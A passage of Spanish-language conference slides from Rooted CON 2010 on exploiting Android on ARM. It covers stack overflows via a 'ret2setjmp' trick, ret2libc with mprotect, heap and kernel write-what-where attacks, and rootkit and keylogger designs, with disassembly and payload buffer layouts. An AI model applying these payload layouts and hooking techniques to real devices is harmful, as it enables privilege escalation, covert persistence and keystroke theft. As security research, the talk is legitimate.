  • 30. Buffer overflow - Stack 00008520 <read_msg>: 8520: b5f0 push {r4, r5, r6, r7, lr} 8522: 4d12 ldr r5,[pc, #72] (856c+<.text+0x8c>) 8524: b093 sub sp, #76 8526: a911 add r1, sp, #68 [...] 8568: b013 add sp, #76 856a: bdf0 pop {r4, r5, r6, r7, pc} !! • Controlamos 4 registros generales y el PC Congreso de Seguridad ~ Rooted CON’2010 30
  • 31. Buffer overflow - Stack • Explotación – ret2libc : Paso de registros en parámetros? – jmp/branch sp : No encontrado inicialmente – ret2setjmp • setjmp copia registros en memoria • Podremos elegir dónde y saltar a ellos • Pero toma los parámetros en registros... o no? Congreso de Seguridad ~ Rooted CON’2010 31
  • 32. Desensamblado de setjmp (gdb) disass setjmp Dump of assembler code for function setjmp: 0xafe0dd20 <setjmp+0>: push {r0, lr} 0xafe0dd24 <setjmp+4>: mov r0, #0 ; 0x0 0xafe0dd28 <setjmp+8>: blx 0xafe12094 <sigblock> 0xafe0dd2c <setjmp+12>: mov r1, r0 0xafe0dd30 <setjmp+16>: pop {r0, lr} !! 0xafe0dd34 <setjmp+20>: str r1, [r0, #100] 0xafe0dd38 <setjmp+24>: ldr r1, [pc, #16] ; 0xafe0dd50 <setjmp+48> 0xafe0dd3c <setjmp+28>: str r1, [r0], #4 0xafe0dd40 <setjmp+32>: add r0, r0, #52 ; 0x34 0xafe0dd44 <setjmp+36>: stm r0, {r4-r12, sp, lr} !! 0xafe0dd48 <setjmp+40>: mov r0, #0 ; 0x0 0xafe0dd4c <setjmp+44>: bx lr Congreso de Seguridad ~ Rooted CON’2010 32
  • 33. Buffer overflows - ret2setjmp • La técnica: – Meter stub en registros controlados – Salto a setjmp+0x10 – Retorno a los registros controlados – Repetir si necesitamos más código • Limitaciones – Necesitamos controlar al menos un registro – Necesitamos setjmp en dirección predecible – Necesitamos región rwx para poner stub Congreso de Seguridad ~ Rooted CON’2010 33
  • 34. Buffer overflows – Evil buffer • En nuestro caso controlamos r4-r7 Congreso de Seguridad ~ Rooted CON’2010 34
  • 35. Buffer overflows – Evil buffer • En nuestro caso controlamos r4-r7 <padding> -> Rellena el buffer <b sp><b sp><b sp><b sp> --> r4-r7 <0xafe0dd30> --> setjmp+0x10 <destino><destino+offset_r4> --> r0,lr <shellcode> --> evil shellcode ☺ Congreso de Seguridad ~ Rooted CON’2010 35
  • 36. Buffer overflows - Stack • ¡¡Demo!! Congreso de Seguridad ~ Rooted CON’2010 36
  • 37. Buffer overflows - ret2libc • Reutilizaremos la técnica anterior – Código en memoria con setjmp • Parámetros a registros • Llamadas a libc • Podemos encadenar setjmp’s – Más código controlable – Puede que solo controlemos un registro Congreso de Seguridad ~ Rooted CON’2010 37
  • 38. Buffer overflows - ret2libc • Demo – Usaremos mprotect para hacer pila no accesible • El exploit resulta en un segfault • Si la pila fuera NX, la podríamos hacer RWX <pop {r0,r1,r2,r3}><and r0,r0,sp><blx r3><b sp> <0xafe0dd30><destino><destino+offset_r4> <PAGE_SHIFT><0x01><0x00><mprotect> <shellcode> Congreso de Seguridad ~ Rooted CON’2010 38
  • 39. Buffer overflows - ret2libc • ¡¡Demo!! Congreso de Seguridad ~ Rooted CON’2010 39
  • 40. Buffer overflows - Heap • Bionic libc incorpora DLMalloc 2.8.4 – Listas enlazadas para chunks pequeños – Árboles binarios para chunks medianos – Chunks grandes se reservan con mmap • Seguridad – Safe unlinking – ptr > mmap_least_addr antes de usarlo – Otros… • No conocemos técnica genérica Congreso de Seguridad ~ Rooted CON’2010 40
  • 41. Buffer overflows - Heap • ¡¡Demo!! Congreso de Seguridad ~ Rooted CON’2010 41
  • 42. Agenda • Introducción • Shellcoding • Buffer overflows • Kernel land • Post explotación Congreso de Seguridad ~ Rooted CON’2010 42
  • 43. Kernel – Fallos típicos • NULL ptr dereference – Binario con sección mapeada en NULL • mmap_min_addr protege frente a ello • Ver exploit sock_sendpage() de Zinx • Buffer overflows – Stack: retorno a función en userspace – Slab: rellenar slab + overflow + dereference • Ver paper en Phrack #64 Congreso de Seguridad ~ Rooted CON’2010 43
  • 44. Kernel – Fallos típicos • Write-what-where – Escritura en dirección controlable – Contenidos controlados o no – ¿Qué sobrescribimos? • Explotando write-what-where’s – Tablas del kernel – Tablas específicas de la arquitectura –… Congreso de Seguridad ~ Rooted CON’2010 44
  • 45. ARM - Excepciones • Tabla de vectores de excepción – Instrucciones a ejecutar en caso de excepción Congreso de Seguridad ~ Rooted CON’2010 45
  • 46. EVT en Android • EVT puede estar en 0x0000000 o 0xFFFF000 – Linux usa 0xFFFF0000 (gdb) x/8i 0xFFFF0000 0xffff0000: svc 0x009f0000 0xffff0004: b 0xffff0380 0xffff0008: ldr pc, [pc, #1040]; 0xffff0420 0xffff000c: b 0xffff0300 0xffff0010: b 0xffff0280 0xffff0014: b 0xffff0404 0xffff0018: b 0xffff0200 0xffff001c: b 0xffff0400 Congreso de Seguridad ~ Rooted CON’2010 46
  • 47. EVT en Android • Instrucción branch – Desplazamiento máximo 24 bits – Espacio de usuario demasiado lejos! • Sigamos investigando… – Veamos qué pasa ante instrucciones ilegales Congreso de Seguridad ~ Rooted CON’2010 47
  • 48. EVT en Android 0xffff0380: stmia sp, {r0, lr} 0xffff0384: mrs lr, SPSR 0xffff0388: str lr, [sp, #8] 0xffff038c: mrs r0, CPSR 0xffff0390: eor r0, r0, #8 ; 0x8 0xffff0394: msr SPSR_fsxc, r0 0xffff0398: and lr, lr, #15 ; 0xf 0xffff039c: mov r0, sp 0xffff03a0: ldr lr, [pc, lr, lsl #2] 0xffff03a4: movs pc, lr 0xffff03a8: 0xc0023c20 <__und_usr> 0xffff03ac: 0xffff03b0: 0xffff03b4: 0xc0023970 <__und_invalid> 0xc0023970 <__und_invalid> 0xc0023a60 <__und_svc> ! Congreso de Seguridad ~ Rooted CON’2010 48
  • 49. Explotando write-what-where • Idea – Sobrescribir handler de instrucción ilegal • Apuntar a nuestro propio código – Ejecutar instrucción ilegal • Se ejecuta nuestro código – Dar privilegios y restaurar handler Congreso de Seguridad ~ Rooted CON’2010 49
  • 50. Agenda • Introducción • Shellcoding • Buffer overflows • Kernel land • Post explotación Congreso de Seguridad ~ Rooted CON’2010 50
  • 51. Got root! Now what? • Rootkits – Mantener acceso al sistema – Ocultar presencia del atacante • Rootkits en Linux – Generalmente inyectan LKMs • Junto con app en user-space Congreso de Seguridad ~ Rooted CON’2010 51
  • 52. Syscall hooking • Hooking as usual – sys_call_table hook – Parchear sys_call_handler – Parchear syscall – … • Vectores de excepción – Modificar vector SVC Congreso de Seguridad ~ Rooted CON’2010 52
  • 53. Android keylogger • Teclado virtual – Driver registra handler para IRQ #16 – Lee keycode y lo registra en el kernel • Opciones: – Modificar irq_handlers[] – Modificar código del driver – Modificar vector de excepción Congreso de Seguridad ~ Rooted CON’2010 53
  • 54. Post-explotación ¡Demos! Congreso de Seguridad ~ Rooted CON’2010 54
  • 55. Rootkit más silencioso • ARM permite poner la EVT en 0x0000000 – Un bit en el registro de control (CR) del coprocesador que controla el sistema (SCC) define dónde está • Un rootkit podría duplicarla – Interceptar syscalls interesantes – Redirigir el resto • Cloaker implementa esta idea – Paper en http://srgsec.cs.illinois.edu/cloaker.pdf Congreso de Seguridad ~ Rooted CON’2010 55
  • 56. ¡Gracias por vuestra atención! Javier Moreno Eloi Sanfèlix vierito5@gmail.com eloi@limited-entropy.com http://vierito.es http://limited-entropy.com Gracias a M.A. Mateo y A. Perles, DISCA UPV, por prestarnos el hardware Congreso de Seguridad ~ Rooted CON’2010 56